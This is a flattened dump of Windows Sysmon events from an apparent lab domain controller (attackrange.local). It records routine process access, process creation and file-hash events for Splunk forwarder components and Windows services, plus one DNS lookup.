14:00:18.904{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201800Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:18.904{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201799Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:18.904{5ABCFE62-842D-603E-0500-00000000AD01}416532C:\Windows\system32\csrss.exe{5ABCFE62-E7F2-6040-0E4E-00000000AD01}5164C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002201798Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:18.904{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E7F2-6040-0E4E-00000000AD01}5164C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002201797Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:18.905{5ABCFE62-E7F2-6040-0E4E-00000000AD01}5164C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002201796Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:18.638{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=354DF45E32F75404F6F080C96D8CCEC0,SHA256=5D2B34569E76F45FB1941A84ECAA99BC5930924B941EBF3DE172962972B54686,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002201795Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:18.357{5ABCFE62-E7F2-6040-0D4E-00000000AD01}61243432C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201794Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:18.232{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E7F2-6040-0D4E-00000000AD01}6124C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201793Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:18.232{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201792Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:18.232{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201791Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:18.232{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201790Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:18.232{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201789Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:18.232{5ABCFE62-842D-603E-0500-00000000AD01}416432C:\Windows\system32\csrss.exe{5ABCFE62-E7F2-6040-0D4E-00000000AD01}6124C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002201788Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:18.232{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E7F2-6040-0D4E-00000000AD01}6124C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002201787Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:18.233{5ABCFE62-E7F2-6040-0D4E-00000000AD01}6124C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002201786Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:18.123{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70BDBD9FDC8BE90B02B4AFF3BB55DB6B,SHA256=7B3D49C4B1993AFAA97EDED3D85384ECDAE6C56FEADD5946378AC4582771D998,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201815Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:19.951{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=48CF12D54F8FE9D10AFC777CED79BE3F,SHA256=A508E0BE558F655992291A96F9A5EAD1952364F067D948D1A28D1785B52F2FED,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002201814Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:19.701{5ABCFE62-E7F3-6040-0F4E-00000000AD01}5256172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201813Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:19.576{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E7F3-6040-0F4E-00000000AD01}5256C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201812Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:19.576{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201811Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:19.576{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201810Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:19.576{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201809Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:19.576{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201808Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:19.576{5ABCFE62-842D-603E-0500-00000000AD01}416340C:\Windows\system32\csrss.exe{5ABCFE62-E7F3-6040-0F4E-00000000AD01}5256C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002201807Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:19.576{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E7F3-6040-0F4E-00000000AD01}5256C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002201806Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:19.576{5ABCFE62-E7F3-6040-0F4E-00000000AD01}5256C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002201805Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:19.138{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FBF345A1FD331AEB3939021701250575,SHA256=EC80DAE73429D03AE3A45F090C240C3ED3E66CC476FB0CE02055201AF41D6E17,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201816Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:20.154{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=912349D1F7EA08C09381583345AB8449,SHA256=3CA04872142F2EDBF75D550BD03D184E3C4AAD0ABB8A33AC5BB7A2872D4B5302,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201819Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:21.920{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8985C832796C9A0D57629E480AFC63C1,SHA256=88478EB2AF3F13902C4517F55F20B4FD42226D8D7C27AAD81A9E8F337E8ADDEF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201818Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:17.521{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetruefe80:0:0:0:0:ffff:ffff:fffe-53076-true2001:7fd:0:0:0:0:0:1k.root-servers.net53domain 23542300x80000000000000002201817Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:21.170{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC2B067296C9CF475EA1B266E2C1C5F2,SHA256=3592336172FEFBCDCCCF73548BEFEB588FB4DAC6EF1B41BA8E49EAF9538194F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201821Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:22.201{5ABCFE62-842F-603E-1100-00000000AD01}620NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=ABD89BB3EC67C22369ABD5CF39F259D7,SHA256=331677911D2B6A80AAB15178EEC5C24DF015F02F00840AD7853994BB1B61CDBC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201820Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:22.170{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB0D58F74A1A2CD0165ED9F44F9A61DB,SHA256=08691A3AA9E46F6527039C30D721E30516D9AD00E8D0D91A1C31E2A4292A16EE,IMPHASH=00000000000000000000000000000000falsetrue 